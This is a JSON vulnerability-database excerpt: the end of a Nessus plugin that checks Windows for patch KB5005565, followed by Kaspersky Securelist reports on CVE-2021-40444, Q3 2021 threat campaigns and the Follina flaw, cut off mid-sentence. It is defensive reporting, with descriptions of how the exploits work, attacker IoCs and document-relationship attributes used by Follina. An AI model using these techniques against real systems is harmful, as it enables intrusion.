https://support.microsoft.com/en-us/topic/september-14-2021-kb5005565-os-builds-19041-1237-19042-1237-and-19043-1237-292cf8ed-f97b-4cd8-9883-32b71e3e6b44\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?45dd819c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005565.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-09';\nkbs = make_list(\n '5005565'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005565])\n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005565]) \n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19043',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005565])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2021-09-25T08:35:29", "description": "\n\n## Summary\n\nLast week, Microsoft reported the remote code execution vulnerability CVE-2021-40444 in the MSHTML browser engine. According to the company, this vulnerability has already been used in targeted attacks against Microsoft Office users. In attempt to exploit this vulnerability, attackers create a document with a specially-crafted object. If a user opens the document, MS Office will download and execute a malicious script. \nAccording to our data, the same attacks are still happening all over the world. We are currently seeing attempts to exploit the CVE-2021-40444 vulnerability targeting companies in the research and development sector, the energy sector and large industrial sectors, banking and medical technology development sectors, as well as telecommunications and the IT sector. Due to its ease of exploitation and the few published [Proof-of-Concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (PoC), we expect to see an increase in attacks using this vulnerability.\n\n_Geography of CVE-2021-40444 exploitation attempts_\n\nKaspersky is aware of targeted attacks using CVE-2021-40444, and our products protect against attacks leveraging the vulnerability. Possible detection names are:\n\n * HEUR:Exploit.MSOffice.CVE-2021-40444.a\n * HEUR:Trojan.MSOffice.Agent.gen\n * PDM:Exploit.Win32.Generic\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/16133928/02-cve-2021-40444-kedr.png>) \n_Killchain generated by KEDR during execution of CVE-2021-40444 Proof-of-Concept _\n\nExperts at Kaspersky are monitoring the situation closely and improving mechanisms to detect this vulnerability using [Behavior Detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and [Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) components. Within our [Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service, our SOC experts are able to detect when this vulnerability is expoited, investigate such attacks and notify customers.\n\n## Technical details\n\nThe remote code execution vulnerability CVE-2021-40444 was found in MSHTML, the Internet Explorer browser engine which is a component of modern Windows systems, both user and server. Moreover, the engine is often used by other programs to work with web content (e.g. MS Word or MS PowerPoint). \nIn order to exploit the vulnerability, attackers embed a special object in a Microsoft Office document containing an URL for a malicious script. If a victim opens the document, Microsoft Office will download the malicious script from the URL and run it using the MSHTML engine. Then the script can use ActiveX controls to perform malicious actions on the victim's computer. For example, the original zero-day exploit which was used in targeted attacks at the time of detection used ActiveX controls to download and execute a Cobalt Strike payload. We are currently seeing various types of malware, mostly backdoors, which are delivered by exploiting the CVE-2021-40444 vulnerability.\n\n## Mitigations\n\n * Follow [Microsoft security update guidelines.](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>)\n * Use the latest [Threat Intelligence information](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) to keep up to date with TTPs used by threat actors.\n * Businesses should use a security solution that provides vulnerability, patch management and exploit prevention components, such as the [Automatic Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) component in Kaspersky Endpoint Security for Business. The component monitors suspicious actions in applications and blocks malicious file execution.\n * Use solutions like [Kaspersky Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) and [Kaspersky Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service, which help identify and stop an attack at an early stage before the attackers achieve their final goal.\n\n## IoC\n\n**MD5** \n[ef32824c7388a848c263deb4c360fd64](<https://opentip.kaspersky.com/ef32824c7388a848c263deb4c360fd64/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) \n[e58b75e1f588508de7c15a35e2553b86](<https://opentip.kaspersky.com/e58b75e1f588508de7c15a35e2553b86/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) \n[e89dbc1097cfb8591430ff93d9952260](<https://opentip.kaspersky.com/e89dbc1097cfb8591430ff93d9952260/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)\n\n**URL** \n[hidusi[.]com](<https://opentip.kaspersky.com/hidusi.com/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) \n[103.231.14[.]134](<https://opentip.kaspersky.com/103.231.14.134/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)", "cvss3": {}, "published": "2021-09-16T15:30:57", "type": "securelist", "title": "Exploitation of the CVE-2021-40444 vulnerability in MSHTML", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-16T15:30:57", "id": "SECURELIST:63306FA6D056BD9A04969409AC790D84", "href": "https://securelist.com/exploitation-of-the-cve-2021-40444-vulnerability-in-mshtml/104218/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T14:36:44", "description": "\n\n * **IT threat evolution Q3 2021**\n * [IT threat evolution in Q3 2021. PC statistics](<https://securelist.com/it-threat-evolution-in-q3-2021-pc-statistics/104982/>)\n * [IT threat evolution in Q3 2021. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2021-mobile-statistics/105020/>)\n\n## Targeted attacks\n\n### WildPressure targets macOS\n\nLast March, we reported a [WildPressure campaign targeting industrial-related entities in the Middle East](<https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/>). While tracking this threat actor in spring 2021, we discovered a newer version. It contains the C++ Milum Trojan, a corresponding VBScript variant and a set of modules that include an orchestrator and three plugins. This confirms our previous assumption that there were more last-stagers besides the C++ ones.\n\nAnother language used by WildPressure is Python. The PyInstaller module for Windows contains a script named "Guard". Interestingly, this malware was developed for both Windows and macOS operating systems. The coding style, overall design and C2 communication protocol is quite recognizable across all three programming languages used by the authors.\n\nWildPressure used both virtual private servers (VPS) and compromised servers in its infrastructure, most of which were WordPress websites.\n\nWe have very limited visibility for the samples described in our report, but our telemetry suggests that the targets in this campaign were also from the oil and gas industry.\n\nYou can view our report on the new version [here](<https://securelist.com/wildpressure-targets-macos/103072/>), together with a video presentation of our findings.\n\n### LuminousMoth: sweeping attacks for the chosen few\n\nWe recently uncovered a large-scale and highly active attack against targets in Southeast Asia by a threat actor that we call [LuminousMoth](<https://securelist.com/apt-luminousmoth/103332/>). The campaign dates back to October last year and was still ongoing at the time we published our public report in July. Most of the early sightings were in Myanmar, but it seems the threat actor is now much more active in the Philippines. Targets include high-profile organizations: namely, government entities located both within those countries and abroad.\n\nMost APT threats carefully select their targets and tailor the infection vectors, implants and payloads to the victims' identities or environment. It's not often we observe a large-scale attack by APT threat actors \u2013 they usually avoid such attacks because they are too 'noisy' and risk drawing attention to the campaign. LuminousMoth is an exception. We observed a high number of infections; although we think the campaign was aimed at a few targets of interest.\n\nThe attackers obtain initial access to a system by sending a spear-phishing email to the victim containing a Dropbox download link. The link leads to a RAR archive that masquerades as a Word document. The archive contains two malicious DLL libraries as well as two legitimate executables that side-load the DLL files. We found multiple archives like this with file names of government entities linked to Myanmar.\n\nWe also observed a second infection vector that comes into play after the first one has successfully finished. The malware tries to spread to other hosts on the network by infecting USB drives.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/12153755/LuminousMoth_01.png>)\n\nIn addition to the malicious DLLs, the attackers also deployed a signed, but fake version of the popular application Zoom on some infected systems, enabling them to exfiltrate data.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/12154002/LuminousMoth_05.png>)\n\nThe threat actor also deploys an additional tool that accesses a victim's Gmail session by stealing cookies from the Chrome browser.\n\nInfrastructure ties as well as shared TTPs allude to a possible connection between LuminousMoth and the HoneyMyte threat group, which has been seen targeting the same region using similar tools in the past.\n\n### Targeted attacks exploiting CVE-2021-40444\n\nOn September 7, [Microsoft reported a zero-day vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) (CVE-2021-40444) that could allow an attacker to execute code remotely on vulnerable computers. The vulnerability is in MSHTML, the Internet Explorer engine. Even though few people use IE nowadays, some programs use its engine to handle web content \u2013 in particular, Microsoft Office applications.\n\nWe [have seen targeted attacks](<https://securelist.com/exploitation-of-the-cve-2021-40444-vulnerability-in-mshtml/104218/>) exploiting the vulnerability to target companies in research and development, the energy sector and other major industries, banking, the medical technology sector, as well as telecoms and IT.\n\nTo exploit the vulnerability, attackers embed a special object in a Microsoft Office document containing a URL for a malicious script. If the victim opens the document, Microsoft Office downloads the script and runs it using the MSHTML engine. Then the script can use ActiveX controls to perform malicious actions on the victim's computer.\n\n### Tomiris backdoor linked to SolarWinds attack\n\nThe SolarWinds incident last December stood out because of the extreme carefulness of the attackers and the high-profile nature of their victims. The evidence suggests that the threat actor behind the attack, DarkHalo (aka Nobelium), had spent six months inside OrionIT's networks to perfect their attack. The following timeline sums up the different steps of the campaign.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/27145035/SAS_story_Tomiris_connection_01.png>)\n\nIn June, more than six months after DarkHalo had gone dark, we observed the DNS hijacking of multiple government zones of a CIS member state that allowed the attacker to redirect traffic from government mail servers to computers under their control \u2013 probably achieved by obtaining credentials to the control panel of the victims' registrar. When victims tried to access their corporate mail, they were redirected to a fake copy of the web interface.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/27145115/SAS_story_Tomiris_connection_02.png>)\n\nAfter this, they were tricked into downloading previously unknown malware. The backdoor, dubbed Tomiris, bears a number of similarities to the second-stage malware, Sunshuttle (aka GoldMax), used by DarkHalo last year. However, there are also a number of overlaps between Tomiris and Kazuar, a backdoor that has been linked to the Turla APT threat actor. None of the similarities is enough to link Tomiris and Sunshuttle with sufficient confidence. However, taken together they suggest the possibility of common authorship or shared development practices.\n\nYou can read our analysis [here](<https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/>).\n\n### GhostEmperor\n\nEarlier this year, while investigating the rise of attacks against Exchange servers, we noticed a recurring cluster of activity that appeared in several distinct compromised networks. We attribute the activity to a previously unknown threat actor that we have called [GhostEmperor](<https://securelist.com/ghostemperor-from-proxylogon-to-kernel-mode/104407/>). This cluster stood out because it used a formerly unknown Windows kernel mode rootkit that we dubbed Demodex; and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers.\n\nThe rootkit is used to hide the user mode malware's artefacts from investigators and security solutions, while demonstrating an interesting loading scheme involving the kernel mode component of an open-source project named Cheat Engine to bypass the Windows Driver Signature Enforcement mechanism.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/29150203/Ghost_Emperor_06.png>)\n\nWe identified multiple attack vectors that triggered an infection chain leading to the execution of the malware in memory. The majority of GhostEmperor infections were deployed on public-facing servers, as many of the malicious artefacts were installed by the httpd.exe Apache server process, the w3wp.exe IIS Windows server process, or the oc4j.jar Oracle server process. This means that the attackers probably abused vulnerabilities in the web applications running on those systems, allowing them to drop and execute their files.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/29150042/Ghost_Emperor_04.png>)\n\nAlthough infections often start with a BAT file, in some cases the known infection chain was preceded by an earlier stage: a malicious DLL that was side-loaded by wdichost.exe, a legitimate Microsoft command line utility (originally called MpCmdRun.exe). The side-loaded DLL then proceeds to decode and load an additional executable called license.rtf. Unfortunately, we did not manage to retrieve this executable, but we saw that the consecutive actions of loading it included the creation and execution of GhostEmperor scripts by wdichost.exe.\n\nThis toolset was in use from as early as July 2020, mainly targeting Southeast Asian entities, including government agencies and telecoms companies.\n\n### FinSpy: analysis of current capabilities\n\nAt the end of September, at the Kaspersky [Security Analyst Summit](<https://thesascon.com/>), our researchers provided an [overview of FinSpy](<https://securelist.com/finspy-unseen-findings/104322/>), an infamous surveillance toolset that several NGOs have repeatedly reported being used against journalists, political dissidents and human rights activists. Our analysis included not only the Windows version of FinSpy, but also Linux and macOS versions, which share the same internal structure and features.\n\nAfter 2018, we observed falling detection rates for FinSpy for Windows. However, it never actually went away \u2013 it was simply using various first-stage implants to hide its activities. We started detecting some suspicious backdoored installer packages (including TeamViewer, VLC Media Player and WinRAR); then in the middle of 2019 we found a host that served these installers along with FinSpy Mobile implants for Android.\n\nThe authors have gone to great lengths to make FinSpy inaccessible to security researchers \u2013 it seems they have put as much work into anti-analysis and obfuscation as they have into the Trojan itself. First, the samples are protected with multiple layers of evasion tactics.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/24151828/SAS_story_FinFisher_02.png>)\n\nMoreover, once the Trojan has been installed, it is heavily camouflaged using four complex, custom-made obfuscators.\n\nApart from Trojanized installers, we also observed infections involving use of a UEFI (Unified Extensible Firmware Interface) and MBR (Master Boot Record) bootkit. While the MBR infection has been known since at least 2014, details on the UEFI bootkit were publicly revealed for the first time in our private report on FinSpy.\n\nThe user of a smartphone or tablet can be infected through a link in a text message. In some cases (for example, if the victim's iPhone has not been not [jailbroken](<https://encyclopedia.kaspersky.com/glossary/jailbreak/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)), the attacker may need physical access to the device.\n\n## Other malware\n\n### REvil attack on MSPs and their customers worldwide\n\nAn attack perpetrated by the REvil Ransomware-as-a-Service gang (aka Sodinokibi) targeting Managed Service Providers (MSPs) and their clients was discovered on July 2.\n\nThe attackers [identified and exploited](<https://threatpost.com/kaseya-patches-zero-day-exploits/167548/>) a zero-day vulnerability in the Kaseya Virtual System/Server Administrator (VSA) platform. The VSA software, used by Kaseya customers to remotely monitor and manage software and network infrastructure, is supplied either as a cloud service or via on-premises VSA servers.\n\nThe exploit involved deploying a malicious dropper via a PowerShell script. The script disabled Microsoft Defender features and then used the certutil.exe utility to decode a malicious executable (agent.exe) that dropped an older version of Microsoft Defender, along with the REvil ransomware packed into a malicious library. That library was then loaded by the legitimate MsMpEng.exe by utilizing the DLL side-loading technique.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/05113533/02-revil-attacks-msp.png>)\n\nThe attack is estimated to have resulted in the encryption of files belonging to around 60 Kaseya customers using the on-premises version of the platform. Many of them were MSPs who use VSA to manage the networks of other businesses. This MSP connection gave REvil access to those businesses, and Kaseya estimated that [around 1,500 downstream businesses were affected](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-2nd-2021>).\n\nUsing our Threat Intelligence service, we observed more than 5,000 attack attempts in 22 countries by the time [our analysis of the attack](<https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/>) was published.\n\n### What a [Print]Nightmare\n\nEarly in July, Microsoft published an alert about vulnerabilities in the Windows Print Spooler service. The vulnerabilities, [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>) and [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>) (aka PrintNightmare), can be used by an attacker with a regular user account to take control of a vulnerable server or client machine that runs the Windows Print Spooler service. This service is enabled by default on all Windows clients and servers, including domain controllers, making both vulnerabilities potentially very dangerous.\n\nMoreover, owing to a misunderstanding between teams of researchers, a [proof-of-concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (PoC) exploit for PrintNightmare was [published](<https://therecord.media/poc-released-for-dangerous-windows-printnightmare-bug/>) online. The researchers involved believed that Microsoft's Patch Tuesday release in June had already solved the problem, so they shared their work with the expert community. However, while Microsoft had published a patch for CVE-2021-1675, the PrintNightmare vulnerability remained unpatched until July. The PoC was quickly removed, but not before it had been copied multiple times.\n\nCVE-2021-1675 is a [privilege elevation](<https://encyclopedia.kaspersky.com/glossary/privilege-escalation/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) vulnerability, allowing an attacker with low access privileges to craft and use a malicious DLL file to run an exploit and gain higher privileges. However, that is only possible if the attacker already has direct access to the vulnerable computer in question.\n\nCVE-2021-34527 is significantly more dangerous because it is a [remote code execution](<https://encyclopedia.kaspersky.com/glossary/remote-code-execution-rce/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (RCE) vulnerability, which means it allows remote injection of DLLs.\n\nYou can find a more detailed technical description of both vulnerabilities [here](<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>).\n\n### Grandoreiro and Melcoz arrests\n\nIn July, the Spanish Ministry of the Interior [announced](<http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853>) the arrest of 16 people connected to the [Grandoreiro and Melcoz (aka Mekotio) cybercrime groups](<https://securelist.com/arrests-of-members-of-tetrade-seed-groups-grandoreiro-and-melcoz/103366/>). Both groups are originally from Brazil and form part of the [Tetrade umbrella](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>), operating for a few years now in Latin America and Western Europe.\n\nThe Grandoreiro banking Trojan malware family initially started its operations in Brazil and then expanded its operations to other Latin American countries and then to Western Europe. The group has regularly improved its techniques; and, based on our analysis of the group's campaigns, it operates as a [malware-as-a-service (MaaS)](<https://encyclopedia.kaspersky.com/glossary/malware-as-a-service-maas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) project. Our telemetry shows that, since January 2020, Grandoreiro has mainly attacked victims in Brazil, Mexico, Spain, Portugal and Turkey.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/14175031/tetrade_arrest_01.png>)\n\nMelcoz had been active in Brazil since at least 2018, before expanding overseas. We observed the group attacking assets in Chile in 2018 and, more recently, in Mexico: it's likely that there are victims in other countries too, as some of the targeted banks have international operations. As a rule, the malware uses AutoIt or VBS scripts, added into MSI files, which run malicious DLLs using the DLL-Hijack technique, aiming to bypass security solutions. The malware steals passwords from browsers and from the device's memory, providing remote access to capture internet banking access. It also includes a Bitcoin wallet stealing module. Our telemetry confirms that, since January 2020, Melcoz has been actively targeting Brazil, Chile and Spain, among other countries.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/14175038/tetrade_arrest_02.png>)\n\nSince both malware families are from Brazil, the individuals arrested in Spain are just operators. So, it's likely that the creators of Grandoreiro and Melcoz will continue to develop new malware techniques and recruit new members in their countries of interest.\n\n### Gamers beware\n\nEarlier this year, we discovered an ad in an underground forum for a piece of malware dubbed BloodyStealer by its creators. The malware is designed to steal passwords, cookies, bank card details, browser auto-fill data, device information, screenshots, desktop and client uTorrent files, Bethesda, Epic Games, GOG, Origin, Steam, Telegram, and VimeWorld client sessions and logs.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141037/bloodystealer-and-gaming-accounts-in-darknet-screen-1.png>)\n\n**_The BloodyStealer ad (Source: [https://twitter.com/3xp0rtblog](<https://twitter.com/3xp0rtblog/status/1380087553676697617>))_**\n\nThe authors of the malware, which has hit users in Europe, Latin America and the Asia-Pacific region, have adopted a MaaS distribution model, meaning that anyone can buy it for the modest price of around $10 per month (roughly $40 for a "lifetime license").\n\nOn top of its theft functions, the malware includes tools to thwart analysis. It sends stolen information as a ZIP archive to the C2 (command-and-control) server, which is protected against DDoS (distributed denial of service) attacks. The cybercriminals use either the (quite basic) control panel or Telegram to obtain the data, including gamer accounts.\n\nBloodyStealer is just one of many tools available on the dark web for stealing gamer accounts. Moreover, underground forums often feature ads offering to post a malicious link on a popular website or selling tools to generate phishing pages automatically. Using these tools, cybercriminals can collect, and then try to monetize, a huge amount of credentials. All kinds of offers related to gamer accounts can be found on the dark web.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141127/bloodystealer-and-gaming-accounts-in-darknet-screen-2.png>)\n\nSo-called logs are among the most popular. These are databases containing reams of data for logging into accounts. In their ads, attackers can specify the types of data, the geography of users, the period over which the logs were collected and other details. For example, in the screenshot below, an underground forum member offers an archive with 65,600 records, of which 9,000 are linked to users from the US, and 5,000 to residents of India, Turkey and Canada. The entire archive costs $150 (that's about 0.2 cents per record).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141203/bloodystealer-and-gaming-accounts-in-darknet-screen-3.png>)\n\nCybercriminals can also use compromised gaming accounts to launder money, distribute phishing links and conduct other illegal business.\n\nYou can read more about gaming threats, including BloodyStealer, [here](<https://securelist.com/game-related-cyberthreats/103675/>) and [here](<https://securelist.com/bloodystealer-and-gaming-assets-for-sale/104319/>).\n\n### Triada Trojan in WhatsApp mod\n\nNot everyone is happy with the official WhatsApp app, turning instead to modified WhatsApp clients for features that the WhatsApp developers haven't yet implemented in the official version. The creators of these mods often embed ads in them. However, their use of third-party ad modules can provide a mechanism for malicious code to be slipped into the app unnoticed.\n\nThis happened recently with FMWhatsApp, a popular WhatsApp mod. In version 16.80.0 the developers used a third-party ad module that includes the Triada Trojan (detected by Kaspersky's mobile antivirus as Trojan.AndroidOS.Triada.ef). This Trojan performs an intermediary function. First, it collects data about the user's device, and then, depending on the information, it downloads one of several other Trojans. You can find a description of the functions that these other Trojans perform in [our analysis of the infected FMWhatsApp mod](<https://securelist.com/triada-trojan-in-whatsapp-mod/103679/>).\n\n### Qakbot banking Trojan\n\nQakBot (aka QBot, QuackBot and Pinkslipbot) is a banking Trojan that was first discovered in 2007, and has been continually maintained and developed since then. It is now one of the leading banking Trojans around the globe. Its main purpose is to steal banking credentials (e.g., logins, passwords, etc.), but it has also acquired functionality allowing it to spy on financial operations, spread itself and install ransomware in order to maximize revenue from compromised organizations.\n\nThe Trojan also includes the ability to log keystrokes, backdoor functionality, and techniques to evade detection. The latter includes virtual environment detection, regular self-updates and cryptor/packer changes. QakBot also tries to protect itself from being analyzed and debugged by experts and automated tools. Another interesting piece of functionality is the ability to steal emails: these are later used by the attackers to send targeted emails to the victims, with the information obtained used to lure victims into opening those emails.\n\nQakBot is known to infect its victims mainly via spam campaigns. In some cases, the emails are delivered with Microsoft Office documents or password-protected archives with documents attached. The documents contain macros and victims are prompted to open the attachments with claims that they contain important information (e.g., an invoice). In some cases, the emails contain links to web pages distributing malicious documents.\n\nHowever, there is another infection vector that involves a malicious QakBot payload being transferred to the victim's machine via other malware on the compromised machine. The initial infection vectors may vary depending on what the threat actors believe has the best chance of success for the targeted organization(s). It's known that various threat actors perform reconnaissance of target organizations beforehand to decide which infection vector is most suitable.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/01145837/Qakbot_technical_analysis_01.png>)\n\nWe analyzed statistics on QakBot attacks collected from our Kaspersky Security Network (KSN), where anonymized data voluntarily provided by Kaspersky users is accumulated and processed. In the first seven months of 2021 our products detected 181,869 attempts to download or run QakBot. This number is lower than the detection number from January to July 2020, though the number of users affected grew by 65% \u2013 from 10,493 in the previous year to 17,316 this year.\n\n_Number of users affected by QakBot attacks from January to July in 2020 and 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/01155141/01-en-qakbot.png>))_\n\nYou can read our full analysis [here](<https://securelist.com/qakbot-technical-analysis/103931/>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-26T12:00:36", "type": "securelist", "title": "IT threat evolution Q3 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527", "CVE-2021-40444"], "modified": "2021-11-26T12:00:36", "id": "SECURELIST:86368EF0EA7DAA3D2AB20E0597A62656", "href": "https://securelist.com/it-threat-evolution-q3-2021/104876/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-08T07:56:31", "description": "\n\nAt the end of May, researchers from the nao_sec team [reported](<https://twitter.com/nao_sec/status/1530196847679401984>) a new zero-day vulnerability in Microsoft Support Diagnostic Tool (MSDT) that can be exploited using Microsoft Office documents. It allowed attackers to remotely execute code on Windows systems, while the victim could not even open the document containing the exploit, or open it in Protected Mode. The vulnerability, which the researchers dubbed Follina, later received the identifier [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>).\n\n## CVE-2022-30190 technical details\n\nBriefly, the exploitation of the CVE-2022-30190 vulnerability can be described as follows. The attacker creates an MS Office document with a link to an external malicious OLE object (_**word/_rels/document.xml.rels**_), such as an HTML file located on a remote server. The data used to describe the link is placed in the **** tag with attributes _**Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject", Target="http_malicious_link!"**_. The link in the **Target** attribute points to the above-mentioned HTML file, inside which a malicious script is written using a special URI scheme. \nWhen opened, the attacker-created document runs MSDT. The attacker can then pass, through a set of parameters, any command to this tool for execution on the victim's system with the privileges of the user who opened the document. What is more, the command can be passed even if the document is opened in Protected Mode and macros are disabled. \nAt the time of posting, two document formats were known to allow CVE-2022-30190 exploitation: Microsoft Word (.docx) and Rich Text Format (.rtf). The latter is more dangerous for the potential victim because it allows execution of a malicious command even without opening the document \u2014 just previewing it in Windows Explorer is enough.\n\n## Protecting against Follina\n\nKaspersky is aware of attempts to exploit the CVE-2022-30190 vulnerability through Microsoft Office documents. Our solutions 